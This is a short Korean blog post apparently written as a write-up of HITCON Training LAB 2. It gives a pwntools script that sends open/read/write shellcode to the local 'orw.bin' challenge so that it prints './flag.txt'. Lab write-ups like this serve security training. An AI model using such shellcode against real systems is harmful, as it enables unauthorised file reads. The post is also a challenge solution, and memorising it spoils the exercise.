ii4gsp

HITCON Training - LAB 2 본문

시스템 해킹/HITCON Training

HITCON Training - LAB 2

ii4gsp 2020. 2. 7. 15:15

orw.bin이란 파일을 ida로 열고 main함수를 보면 shellcode를 입력받는다.

pwntools를 사용하여 문제를 풀면된다.

 

 

 

 

from pwn import *

p = process("orw.bin")
 
payload = ""
payload += asm(shellcraft.open("./flag.txt"))
payload += asm(shellcraft.read("eax", "esp", 24))
payload += asm(shellcraft.write(1, "esp", 24))

p.recvuntil("shellcode: ") 
p.sendline(payload)
p.interactive()

'시스템 해킹 > HITCON Training' 카테고리의 다른 글

HITCON Training - LAB 3  (2) 2020.02.07
HITCON Training - LAB 1  (0) 2020.02.07
Comments